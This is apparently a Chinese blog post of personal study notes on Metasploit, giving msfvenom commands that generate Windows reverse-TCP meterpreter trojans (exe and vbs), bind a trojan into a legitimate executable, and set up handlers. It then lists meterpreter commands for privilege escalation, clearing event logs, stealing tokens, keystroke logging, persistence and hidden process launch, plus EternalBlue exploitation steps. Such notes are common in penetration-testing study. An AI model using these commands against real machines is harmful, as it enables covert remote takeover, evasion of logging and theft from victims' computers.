工具:

Quasar-win:

AhMyth-andriod:

msfconsole启动:

msfconsole

msfconsole -q :无启动状态显示

一、MSF生成木马并连接

使用攻击模块:use exploit/multi/handler

指令:show options - 查看需要填写的参数和参数填写状态

Name Current Setting Required Description
LHOST yes The listen address (an interface may be specified)
 LPORT 4444 yes The listen port

设置LHOST和LPORT: set LHOST 本地ip LPORT 本地启用端口

查看payload:show payloads

设置payload:set payload windows/meterpreter/reverse_tcp

木马生成:

使用msfvenom

msfvenom -p windows/meterpreter/reverse_tcp -f exe -a x86 -o ./meter_re_tcp_x86.exe LHOST=本地ip LPORT=本地端口

msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe -a x64 -o ./meter_re_tcp_x64.exe LHOST=本地ip LPORT=本地端口

运行监听:

先进入使用模块

run

exploit


二、MSF木马VBS配置

windows-vbs:

        vbs:源码型脚本

使用msfvenom

msfvenom -p windows/meterpreter/reverse_tcp -f vbs -a x86 -o ./meter_re_tcp_x86.exe LHOST=本地ip LPORT=本地端口

msfconsole -r file        (文件中写相关命令,msfmu 会自动读取文件并执行)


三、MSF木马捆绑

将木马捆绑到正常文件当中

msfvenom -p windows/meterpreter/reverse_tcp -f exe -x ./test.exe -a x86 --platform windows -o ./kunbang.exe LHOST=连接ip LPORT=4444

注意:找一个有效的可执行文件

木马混淆


Meterpreter

一、概述

用于木马管理(操作电脑,功能完全)

二、操作

1. 连接之后,屏幕实时显示:screenshare

2.操作控制:ls查看文件

3.上传下载:download 文件名

#文件操作:

linux文件命令操作方式

文件路径:本机:getlwd        远程:getwd

下载文件:download 文件名

上传文件:upload

        编辑:edit 文件名

搜索文件:search 文件名

查看挂载硬盘:show_mount

hash查看:checksum

#系统操作

编号 描述 命令
1 提权 getsystem
2 清除事件日志 clearev
3 获取环境变量 getenv
4 获取pid getpid

Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getsid        Get the SID of the user that the server is running as
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine提权恢复
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS

#网络操作

Command       Description
    -------       -----------
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service端口转发
    resolve       Resolve a set of host names on the target
    route         View and modify the routing table

端口转发:

#其他操作

交互命令

键盘、鼠标操作和记录;关闭键盘、鼠标事件

修改时间戳

三、MSF链接多个木马

set exitonsession false        #可以连接多个session,默认true

run -j        #后台监听

jobs        #查看监听

jobs -p        关闭监听

sessions -i id        #进行操作

bg        #回退

jobs -k        #关闭监听

四、MSF木马持久化

show advanced        #高级指令

run persistence  -参数        #设置持久化

meterpreter> run  persistence -参数

重新生成一个木马(vbs)放入启动项

五、MSF进程迁移

execute:

eg:execute -f notepad

学习参数

execute -f cmd -i进行交互 -H隐藏启动

execute -f /home/kali/Desktop/cmd.exe -m -d notepad        #傀儡进程

六、MSF漏洞扫描

 查找漏洞-使用此攻击模块-进行设置-进行检测-进行攻击

show target 设置攻击目标

back回退到msf6>

?/help        #查看命令

search 漏洞名称        #搜索漏洞

check        #检测该主机是否由此漏洞

eg:使用永恒之蓝进行攻击测试:代号:ms17_010_eternalblue

七、MSF漏洞扫描内网穿透

公网连接内网需要进行内网穿透

端口转发

八、MSF-Stager&Stage

payload三种方式:

single

Stager Stage

windows/(x64)/stage/stager

eg:windows/x64/meterpreter/reverse_tcp     meterpreter:stage  reverse_tcp:stager

攻击成功:先发送stage放入到对方电脑-只有连接作用

分类:

返回stage使用stager的连接方式 

九、exploit小结

根据情况选择攻击模块并使用

根据情况选择payload并使用

查看选项:show options

查看高级:show advanced

设置参数:set

检测能否攻击

运行进行攻击

使用handler进行便捷监听


MSF-Linux攻击

msf6>use payload/linux/x64/meterpreter/reverse_tcp

进行设置

generate -f 文件格式 -o 输出路径        #生成木马

handler -H 连接ip -P 连接端口 -n 名字 -p payload


MSF-Mac攻击

OSX

和linux一样


MSF-Andriod&IOS攻击


MSF-生成跨平台木马

生成源码

可以跨平台执行的编程语言源码或执行文件

msfconsole学习相关推荐

  1. 20159208 《网络攻防实践》第七周学习总结

    20159208 <网络攻防实践>第七周学习总结 教材学习内容总结 20159208 <网络攻防实践>第七周学习总结 教材学习内容总结 本周主要学习了教材的第七章:Window ...

  2. metasploit msfconsole 命令参数

    在MSF里面msfconsole可以说是最流行的一个接口程序.很多人一开始碰到msfconsole的时候就害怕了.那么多复杂的命令语句需要学习,但是msfconsole真的是一个强大的接口程序.Msf ...

  3. 20179214 2017-2018 2《网络攻防实践》第七周学习总结

    视频学习 漏洞利用之检索与利用 有一个漏洞利用工具集 Exploit Databse searchsploit 可以借助关键词搜索出漏洞的相关信息. ikat自动化开启不同的exp.等待目标访问中招. ...

  4. 一次内网靶场学习记录

    环境搭建 web服务器: 外网IP 192.160.0.100 内网IP 10.10.20.12 域内机器win7 : 内网IP 10.10.20.7 内网IP 10.10.10.7 域内服务器 Ms ...

  5. 提权学习之旅——利用Metasploit提权

    Metasploit基础 0x00:简介 Metasploit是一个漏洞利用框架,简称msf.是一个免费的.可下载的框架,通过它可以很容易地获取.开发并对计算机软件漏洞实施攻击,,而且本身附带数百个已 ...

  6. 【DeepExploit】基于强化学习的自动渗透工具

    文章目录 1. 研究背景 1.1 自动化渗透测试研究背景 1.2 DeepExploit简介 1.3 Metasploit简介 1.3.1 Metasploit渗透步骤--以MS17-010为例 1. ...

  7. 关于《Python绝技:运用Python成为顶级黑客》的学习笔记

    本篇文章主要把<Python绝技:运用Python成为顶级黑客>中的代码敲一遍,学学Python安全相关的编程与思路,然后根据具体的情况修改一下代码. 第一章--入门 1.准备开发环境 安 ...

  8. 网络安全之路:我的系统性渗透测试学习框架

    没有兴趣,何来成就,难道就只是为了咕噜猫?hahaha(听不懂吧,没关系,只是因为加密了,你能从我的笔记中找到答案么嘿嘿嘿嘿!!!) 注意:以下内容仅记录本人当时学习时任然不知的相关知识.笔记草率,可 ...

  9. 26学习渗透测试工具 Metasploit 的基本用法,包括漏洞扫描、攻击模块

    Metasploit是一款广泛使用的渗透测试工具,它提供了大量的漏洞扫描.攻击模块和负载等,可以用于评估系统的安全性.下面是Metasploit的基本用法教程,包括漏洞扫描和攻击模块的使用. 漏洞扫描 ...

  10. 【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-7

    目录 第40天:JAVA安全-JWT安全及预编译CASE注入等 第41天:JAVA安全-目录遍历访问控制XSS等安全问题 第42天:漏洞发现-操作系统之漏洞探针类型利用修复 第43天:漏洞发现-WEB ...

最新文章

  1. 3天学会TensorFlow | 香港科技大学
  2. 场效应与三极管 电路标识符_看懂这6个提示,轻松搞定恒流源电源电路设计!...
  3. 关于maven仓库中的_remote.repositories
  4. 支持异构图、集成GraphGym,超好用的图神经网络库PyG更新2.0版本
  5. php manager iis 8,PHPManager2下载
  6. java 解析http返回的xml_Java解析调用webservice服务的返回XML串详解
  7. HTML/CSS入门及基础
  8. Spark配置启动脚本分析
  9. python数据驱动创建账号_Django创建超级管理员账号和修改密码
  10. 算法笔记-二分查找和二分答案
  11. java读取配置文件路径问题
  12. 仿微信拼多多实训笔记
  13. 用vba加载宏求地图分幅
  14. html中图片为什么反了,HTML5 canvas如何实现图片反色
  15. 个人知识管理系统思源笔记
  16. java ckfinder 图片重命名,CKEditor CKFinder图片上传
  17. 问题:MongoDB C# driver异常:Truncation resulted in data loss
  18. 软件缺陷报告模板(微信缺陷报告案例)
  19. BigData之Hadoop:Hadoop框架(分布式系统基础架构)的简介(两大核心【HDFS存储和MapReduce计算】)、深入理解、下载、案例应用之详细攻略
  20. HDU 2340 Obfuscation(dp)

热门文章

  1. C++ 小游戏程序 (共七款)
  2. win7电脑设备序列号怎么查_win7硬盘序列号怎么看|win7查看硬盘序列号的方法
  3. 通过3点计算出一元二次方程解析式
  4. 西游记不单单讲的是故事(2) ------ 摘自 吴闲云的《煮酒探西游》
  5. win10 2016 LTSB
  6. 为什么 BI 软件都搞不定关联分析?带你分析分析
  7. 【java期末复习题】第15章 JDBC数据库编程
  8. matplotlib-27 内嵌环形饼图
  9. laravel框架解决sql注入问题
  10. 计算机网络原理中子网掩码,计算机网络应用 子网掩码计算器(SubNetMaskCalc)